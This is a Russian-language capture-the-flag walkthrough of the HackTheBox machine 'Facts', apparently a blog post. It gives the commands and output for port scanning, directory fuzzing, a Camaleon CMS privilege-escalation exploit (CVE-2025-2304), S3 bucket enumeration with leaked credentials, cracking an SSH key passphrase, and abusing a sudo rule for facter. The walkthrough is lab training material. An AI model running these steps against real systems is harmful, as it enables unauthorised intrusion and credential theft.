{"id":485546,"date":"2026-06-29T20:48:31","date_gmt":"2026-06-29T20:48:31","guid":{"rendered":"https:\/\/savepearlharbor.com\/?p=485546"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=485546","title":{"rendered":"Facts \u2014 \u043f\u0440\u043e\u0445\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b \u043e\u0442 HackTheBox"},"content":{"rendered":"
\n
\"\u0424\u0430\u043a\u0442\u044b\"<\/p>\n
\u0424\u0430\u043a\u0442\u044b<\/figcaption><\/div>\n<\/figure>\n

\u041f\u0440\u043e\u0441\u0442\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430 \u043e\u0442 Hack The Box, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 Camaleon CMS 2.9.0 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c nginx. \u0412 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0441\u0430\u043c\u043e\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0439 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438, \u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043f\u043e\u0441\u043b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (CVE-2025-2304), \u0434\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u043b\u044e\u0431\u043e\u043c\u0443 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 CMS \u0432\u0441\u0435\u0433\u043e \u0437\u0430 \u043e\u0434\u0438\u043d \u0437\u0430\u043f\u0440\u043e\u0441. <\/p>\n

\u0412 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430 \u043c\u0435\u0434\u0438\u0430\u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043f\u0430\u043d\u0435\u043b\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u043c\u043e\u0436\u043d\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f AWS S3. \u041f\u0435\u0440\u0435\u0431\u043e\u0440 (\u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u0435) \u0431\u0430\u043a\u0435\u0442\u043e\u0432 S3 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u0439\u0442\u0438 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u0431\u0430\u043a\u0435\u0442, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0437\u0430\u043a\u0440\u044b\u0442\u044b\u0439 SSH-\u043a\u043b\u044e\u0447, \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0439 \u043f\u0430\u0440\u043e\u043b\u044c\u043d\u043e\u0439 \u0444\u0440\u0430\u0437\u043e\u0439, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u0434\u043e\u0431\u0440\u0430\u0442\u044c. \u0412 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0438 \u043a \u043a\u043b\u044e\u0447\u0443 \u0443\u043a\u0430\u0437\u0430\u043d\u043e \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f (trivia), \u0447\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043f\u043e SSH \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0439 \u0444\u043b\u0430\u0433. \u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0437\u0430 \u0441\u0447\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u0430 sudo, \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u044e\u0449\u0435\u0433\u043e \u043f\u0430\u0440\u043e\u043b\u044f, \u0434\u043b\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u044b \/usr\/bin\/facter<\/code>: \u0444\u043b\u0430\u0433 --custom-dir<\/code> \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u044b Ruby \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root, \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044f \u043f\u0440\u043e\u0441\u0442\u043e\u0439 \u043f\u0443\u0442\u044c \u043a \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044e SUID-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 bash \u0438 root-\u0444\u043b\u0430\u0433\u0430.<\/p>\n

1. Recon (\u0420\u0430\u0437\u0432\u0435\u0434\u043a\u0430)<\/h3>\n

\u0421\u043c\u043e\u0442\u0440\u0438\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0439 \u043a\u043e\u0434 \u0438 \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442\u044b:<\/p>\n

PORT   STATE SERVICE VERSION22\/tcp open  ssh     OpenSSH 9.9p1 Ubuntu 3ubuntu3.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   256 4d:d7:b2:8c:d4:df:57:9c:a4:2f:df:c6:e3:01:29:89 (ECDSA)|_  256 a3:ad:6b:2f:4a:bf:6f:48:ac:81:b9:45:3f:de:fb:87 (ED25519)80\/tcp open  http    nginx 1.26.3 (Ubuntu)|_http-server-header: nginx\/1.26.3 (Ubuntu)| http-methods: |_  Supported Methods: GET HEAD POST OPTIONS|_http-title: Did not follow redirect to http:\/\/facts.htb\/Service Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e \u0441\u0442\u0430\u043d\u0434\u0430\u0440\u0442\u0443 22 \u0438 80 \u043f\u043e\u0440\u0442 \u0412\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u043d\u0430 80 \u043f\u043e\u0440\u0442\u0443 \u0435\u0441\u0442\u044c \u043d\u0435\u043a\u0438\u0439 \u0441\u0430\u0439\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0440\u0435\u0434\u0438\u0440\u0435\u043a\u0442\u0438\u0442 \u043d\u0430 \u0434\u043e\u043c\u0435\u043d facts.htb.<\/p>\n
\u0414\u043e\u0431\u0430\u0432\u043b\u044f\u0435\u043c \u0435\u0433\u043e \u0432 \/etc\/hosts c ip \u0430\u0434\u0440\u0435\u0441\u043e\u043c 10.10.15.138 \u0432 \u043c\u043e\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435. \u041f\u0435\u0440\u0435\u0439\u0434\u044f \u043d\u0430 \u0441\u0430\u0439\u0442, \u0432\u0438\u0434\u0438\u043c \u0447\u0442\u043e \u044d\u0442\u043e \u0441\u0430\u0439\u0442 \u0441 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0430\u0438\u043c \u0438 \u0444\u0430\u043a\u0442\u0430\u043c\u0438. \u041f\u043e\u0445\u043e\u0436\u0435 \u043d\u0430 \u043a\u0430\u043a\u0443\u044e-\u0442\u043e CMS, \u043d\u043e \u0438\u0437 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043f\u043e\u043a\u0430 \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043a\u0430\u043a\u0430\u044f \u0438\u043c\u0435\u043d\u043d\u043e.<\/p>\n
2. \u0424\u0430\u0437\u0437\u0438\u043d\u0433<\/h3>\n
\u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0435\u0441\u0442\u044c \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u044d\u0442\u043e CMS, \u0442\u043e \u0434\u043e\u043b\u0436\u043d\u0430 \u0431\u044b\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u043a\u0430.\u041f\u0440\u0438\u0441\u0442\u0443\u043f\u0430\u0435\u043c \u043a \u0444\u0430\u0437\u0437\u0438\u043d\u0433\u0443. \u041d\u0430\u0443\u0447\u0435\u043d\u043d\u044b\u0439 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u043c \u043e\u043f\u044b\u0442\u043e\u043c CTF, \u0433\u0434\u0435 \u044f \u0431\u0440\u0430\u043b \u043c\u0430\u043b\u0435\u043d\u044c\u043a\u0438\u0435 \u0441\u043b\u043e\u0432\u0430\u0440\u0438 \u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u043b, \u0432 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u044f \u0441\u0440\u0430\u0437\u0443 \u0431\u0435\u0440\u0443 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u0441\u043b\u043e\u0432\u0430\u0440\u044c\u2026<\/p>\n
ffuf -w \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-big.txt  -u \"http:\/\/facts.htb\/FUZZ\"  -ic -c        \/'___\\  \/'___\\           \/'___\\              \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/              \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\              \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/               \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\                 \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/              v2.1.0-dev________________________________________________ :: Method           : GET :: URL              : http:\/\/facts.htb\/FUZZ :: Wordlist         : FUZZ: \/usr\/share\/seclists\/Discovery\/Web-Content\/DirBuster-2007_directory-list-2.3-big.txt :: Follow redirects : false :: Calibration      : false :: Timeout          : 10 :: Threads          : 40 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500________________________________________________rss                     [Status: 200, Size: 183, Words: 20, Lines: 9, Duration: 1060ms]sitemap                 [Status: 200, Size: 3508, Words: 424, Lines: 130, Duration: 1032ms]index                   [Status: 200, Size: 11113, Words: 1328, Lines: 125, Duration: 1138ms]                        [Status: 200, Size: 11098, Words: 1328, Lines: 125, Duration: 1146ms]search                  [Status: 200, Size: 19187, Words: 3276, Lines: 272, Duration: 1794ms]en                      [Status: 200, Size: 11109, Words: 1328, Lines: 125, Duration: 1555ms]page                    [Status: 200, Size: 19593, Words: 3296, Lines: 282, Duration: 1576ms]welcome                 [Status: 200, Size: 11966, Words: 1481, Lines: 130, Duration: 1354ms]admin                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 1323ms]post                    [Status: 200, Size: 11308, Words: 1414, Lines: 152, Duration: 1702ms]ajax                    [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 1336ms]Index                   [Status: 200, Size: 11113, Words: 1328, Lines: 125, Duration: 1319ms]up                      [Status: 200, Size: 73, Words: 4, Lines: 1, Duration: 1667ms]-                       [Status: 200, Size: 11098, Words: 1328, Lines: 125, Duration: 1711ms]404                     [Status: 200, Size: 4836, Words: 832, Lines: 115, Duration: 1879ms]<\/code>
<\/a><\/div><\/pre>\n
\u0414\u0430. \u0415\u0441\u0442\u044c \u0443 \u043d\u0430\u0441 \u043c\u043d\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u043e\u0432, \u043d\u043e \u044f \u043f\u043e\u0439\u0434\u0443 \u0432 \u0430\u0434\u043c\u0438\u043d\u043a\u0443\u2026 <\/p>\n
\"alt<\/p>\n
alt text<\/figcaption><\/div>\n<\/figure>\n
\u0415\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043d\u0438 \u0438\u043c\u0435\u043d\u0438 \u043d\u0438 \u043f\u0430\u0440\u043e\u043b\u044f \u043c\u044b \u043d\u0435 \u0437\u043d\u0430\u0435\u043c, \u043e\u0434\u043d\u0430\u043a\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u043d\u043e\u0432\u044b\u0439 \u0430\u043a\u043a\u0430\u0443\u043d\u0442. \u041f\u043e\u0441\u043b\u0435 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u0438 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0430\u0434\u043c\u0438\u043d \u043f\u0430\u043d\u0435\u043b\u044c, \u043c\u044b \u043d\u0430\u043a\u043e\u043d\u0435\u0446 \u0443\u0437\u043d\u0430\u0435\u043c, \u0447\u0442\u043e \u044d\u0442\u043e Camaleon CMS \u0432\u0435\u0440\u0441\u0438\u0438 2.9.0.<\/p>\n
\u041f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0439 \u0434\u043e \u0430\u0434\u043c\u0438\u043d\u0430 \u0432 CMS<\/h3>\n
\u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u044f \u0441\u0434\u0435\u043b\u0430\u043b, \u044d\u0442\u043e \u043f\u043e\u0448\u0435\u043b \u0432 \u0433\u0443\u0433\u043b \u0438\u0441\u043a\u0430\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0430 \u044d\u0442\u0443 \u0432\u0435\u0440\u0441\u0438\u044e. \u041d\u0430 \u0433\u0438\u0442\u0445\u0430\u0431\u0435 \u0435\u0441\u0442\u044c CVE \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0438\u0437 \u043e\u0431\u044b\u0447\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0430\u0434\u043c\u0438\u043d\u0430\u2026 CVE \u043d\u0430 \u0433\u0438\u0442\u0445\u0430\u0431\u0435<\/a><\/p>\n
python exploit.py -u http:\/\/facts.htb -U test -P test[+]Camaleon CMS Version 2.9.0 PRIVILEGE ESCALATION (Authenticated)[+]Login confirmed   User ID: 5   Current User Role: client[+]Loading PPRIVILEGE ESCALATION   User ID: 5   Updated User Role: admin[+]Reverting User Role<\/code>
<\/a><\/div><\/pre>\n
\u0412\u043e\u0442 \u0442\u0430\u043a \u043e\u0434\u043d\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439 \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043c\u0441\u044f \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u043d\u0430 \u044d\u0442\u043e\u043c \u0441\u0430\u0439\u0442\u0435 \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c, \u043d\u0430\u0434 \u0441\u0430\u0439\u0442\u043e\u043c. <\/p>\n
\"alt<\/p>\n
alt text<\/figcaption><\/div>\n<\/figure>\n
\u0412\u0435\u043a\u0442\u043e\u0440\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0444\u043b\u0430\u0433\u043e\u0432<\/h3>\n
\u041f\u0440\u043e\u043a\u0438\u043d\u0443\u0442\u044c \u0440\u0435\u0432\u0435\u0440\u0441-\u0448\u0435\u043b\u043b, \u044f \u043d\u0435 \u0441\u043c\u043e\u0433 \u0438 \u0441\u0442\u0430\u043b \u0438\u0441\u043a\u0430\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u0435 \u043f\u0443\u0442\u0438. \u0412 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u0445 \u0441\u0430\u0439\u0442\u0430, \u044f \u043d\u0430\u0448\u0435\u043b \u0442\u0430\u043a\u043e\u0439 \u043f\u0443\u043d\u043a\u0442 <\/p>\n
\"alt<\/p>\n
alt text<\/figcaption><\/div>\n<\/figure>\n
\u0412\u0438\u0434\u043d\u043e, \u0447\u0442\u043e \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0435 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435 \u043e\u0442 \u0430\u043c\u0430\u0437\u043e\u043d\u0430 \u0438 \u043a\u0440\u0435\u0434\u044b \u043e\u0442 \u043d\u0435\u0433\u043e. \u041d\u0443\u0436\u043d\u043e \u0437\u0430\u0439\u0442\u0438 \u0432 \u043d\u0435\u0433\u043e \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0432\u0434\u0440\u0443\u0433 \u0435\u0441\u0442\u044c, \u0447\u0442\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0435. \u0414\u043b\u044f \u044d\u0442\u0438\u0445 \u0446\u0435\u043b\u0435\u0439 \u0431\u0443\u0434\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0443 AWS. \u042f \u044d\u0442\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439 \u043d\u0438 \u0440\u0430\u0437\u0443 \u043d\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u0433\u0430\u0439\u0434\u043e\u043c \u043d\u0430 \u041c\u0435\u0434\u0438\u0443\u043c\u0435<\/a><\/p>\n
aws --endpoint-url http:\/\/10.129.10.56:54321 s3 ls s3:\/\/randomfacts --recursive<\/code>
<\/a><\/div><\/pre>\n
\u0417\u0434\u0435\u0441\u044c \u043e\u0434\u043d\u0438 \u043a\u0430\u0440\u0442\u0438\u043d\u043a\u0438 \u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043d\u0435\u0442.\u041e\u0434\u043d\u0430\u043a\u043e \u0435\u0441\u043b\u0438 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u043e\u0439:<\/p>\n
aws --endpoint-url http:\/\/10.129.10.56:54321 s3 ls 2025-09-11 08:06:52 internal2025-09-11 08:06:52 randomfacts<\/code>
<\/a><\/div><\/pre>\n
\u0422\u043e \u043c\u043e\u0436\u043d\u043e \u0443\u0432\u0438\u0434\u0435\u0442\u044c, \u0447\u0442\u043e \u043a\u0440\u043e\u043c\u0435 randomfacts \u0431\u0430\u043a\u0435\u0442\u0430 \u0435\u0441\u0442\u044c \u0435\u0449\u0435 \u0438 internal. \u0418 \u0437\u0434\u0435\u0441\u044c \u0435\u0441\u0442\u044c \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u044b\u0439 \u043a\u043b\u044e\u0447 ssh.<\/p>\n
...2026-01-08 14:01:43          0 .cache\/motd.legal-displayed2026-01-08 13:47:17         20 .lesshst2026-01-08 13:47:17        807 .profile2026-03-04 03:17:40         82 .ssh\/authorized_keys2026-03-04 03:17:40        464 .ssh\/id_ed25519<\/code>
<\/a><\/div><\/pre>\n
\u0418\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0430 \u043e\u0442 \u0440\u0443\u0442\u0430, \u044d\u0442\u043e\u0442 \u043a\u043b\u044e\u0447 \u043d\u0435 \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442, \u044d\u0442\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u0441\u043b\u0438\u0448\u043a\u043e\u043c \u043f\u0440\u043e\u0441\u0442\u043e. \u041c\u043d\u043e\u0433\u043e \u0447\u0435\u0433\u043e \u043f\u0435\u0440\u0435\u043f\u0440\u043e\u0431\u043e\u0432\u0430\u043b \u0438\u0437 cms, \u043d\u043e \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0441\u0440\u0430\u0431\u043e\u0442\u0430\u043b\u043e.<\/p>\n
\u041a \u0442\u043e\u043c\u0443 \u0436\u0435 \u043d\u0430 \u044d\u0442\u043e\u043c \u043a\u043b\u044e\u0447\u0435 \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u044c\u043d\u0430\u044f \u0444\u0440\u0430\u0437\u0430:<\/p>\n
ssh2john id_ed25519 > id_ed25519_hash                                                                                                         \ue0b6 \uf306 \ue0b0\ue0b0 \ueb06 \ue0b1 Downloads \ue0b0\ue0b0 05:47 \ue0b0\ue0b0 0.097s \ue0b0 john id_ed25519_hash --wordlist=\/usr\/share\/wordlists\/rockyou.txt Using default input encoding: UTF-8Loaded 1 password hash (SSH, SSH private key [RSA\/DSA\/EC\/OPENSSH 32\/64])Cost 1 (KDF\/cipher [0=MD5\/AES 1=MD5\/3DES 2=Bcrypt\/AES]) is 2 for all loaded hashesCost 2 (iteration count) is 24 for all loaded hashesWill run 2 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusdragonballz      (id_ed25519)     1g 0:00:06:14 DONE (2026-03-04 05:54) 0.002672g\/s 8.552p\/s 8.552c\/s 8.552C\/s fireman..imissuUse the \"--show\" option to display all of the cracked passwords reliablySession completed. <\/code>
<\/a><\/div><\/pre>\n
\u0423\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0430\u0440\u043e\u043b\u044c\u043d\u0443\u044e \u0444\u0440\u0430\u0437\u0443 \u0438 \u0437\u0434\u0435\u0441\u044c \u043d\u0430\u0445\u043e\u0434\u0438\u043c \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f:<\/p>\n
ssh-keygen -p -f id_ed25519Enter old passphrase: Key has comment 'trivia@facts.htb'Enter new passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved with the new passphrase.<\/code>
<\/a><\/div><\/pre>\n
\u0422\u0435\u043f\u0435\u0440\u044c \u043c\u044b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0438 \u043c\u043e\u0436\u0435\u043c \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u044e\u0437\u0435\u0440\u0441\u043a\u0438\u0439 \u0444\u043b\u0430\u0433:<\/p>\n
trivia@facts:~$ lstrivia@facts:~$ ls -latotal 36drwxr-x--- 6 trivia trivia 4096 Jan 28 16:17 .drwxr-xr-x 4 root   root   4096 Jan  8 17:53 ..lrwxrwxrwx 1 root   root      9 Jan 26 11:40 .bash_history -> \/dev\/null-rw-r--r-- 1 trivia trivia  220 Aug 20  2024 .bash_logout-rw-r--r-- 1 trivia trivia 3900 Jan  8 18:19 .bashrcdrwxrwxr-x 3 trivia trivia 4096 Jan  8 18:01 .bundledrwx------ 2 trivia trivia 4096 Jan  8 18:58 .cachedrwxrwxr-x 3 trivia trivia 4096 Jan  8 17:52 .local-rw-r--r-- 1 trivia trivia  807 Aug 20  2024 .profiledrwx------ 2 trivia trivia 4096 Mar  4 08:17 .sshtrivia@facts:~$ cd \/hometrivia@facts:\/home$ lstrivia  williamtrivia@facts:\/home$ cd william\/trivia@facts:\/home\/william$ lsuser.txttrivia@facts:\/home\/william$ cat user.txt akfalksjfkajfslkasfjlkasjf<\/code>
<\/a><\/div><\/pre>\n
\u041f\u043e\u0432\u044b\u0448\u0430\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0440\u0443\u0442\u0430<\/h3>\n
\u041f\u043e \u043a\u043b\u0430\u0441\u0441\u0438\u043a\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u043c sudo -l.<\/p>\n
trivia@facts:\/home\/william$ sudo -lMatching Defaults entries for trivia on facts:    env_reset, mail_badpass,    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_ptyUser trivia may run the following commands on facts:    (ALL) NOPASSWD: \/usr\/bin\/facter<\/code>
<\/a><\/div><\/pre>\n
\u0418 \u0443 \u043d\u0430\u0441 \u0435\u0441\u0442\u044c \u0443\u0442\u0438\u043b\u0438\u0442\u0430 facter, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u0431\u0435\u0437 \u043f\u0430\u0440\u043e\u043b\u044f.<\/p>\n
\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0434\u0435\u0441\u044c \u043a\u0440\u043e\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0432 sudo -l \u043d\u0435 \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u044b \u0436\u0435\u0441\u0442\u043a\u0438\u0435 \u0430\u0440\u0433\u0443\u043c\u0435\u043d\u0442\u044b. \u042d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c sudo \/usr\/bin\/facter \u0441 \u043b\u044e\u0431\u044b\u043c\u0438 \u0444\u043b\u0430\u0433\u0430\u043c\u0438.<\/p>\n
\u0423 facter \u0435\u0441\u0442\u044c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440 —custom-dir, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0435\u0433\u043e \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0435 \u0444\u0430\u043a\u0442\u044b (\u0441\u043a\u0440\u0438\u043f\u0442\u044b \u043d\u0430 Ruby) \u0438\u0437 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u0439 \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438. \u0422\u0430\u043a \u043a\u0430\u043a facter \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u0447\u0435\u0440\u0435\u0437 sudo, \u043b\u044e\u0431\u043e\u0439 \u043d\u0430\u0448 Ruby-\u0441\u043a\u0440\u0438\u043f\u0442 \u0432 \u044d\u0442\u043e\u0439 \u043f\u0430\u043f\u043a\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u0441\u044f \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 root.<\/p>\n
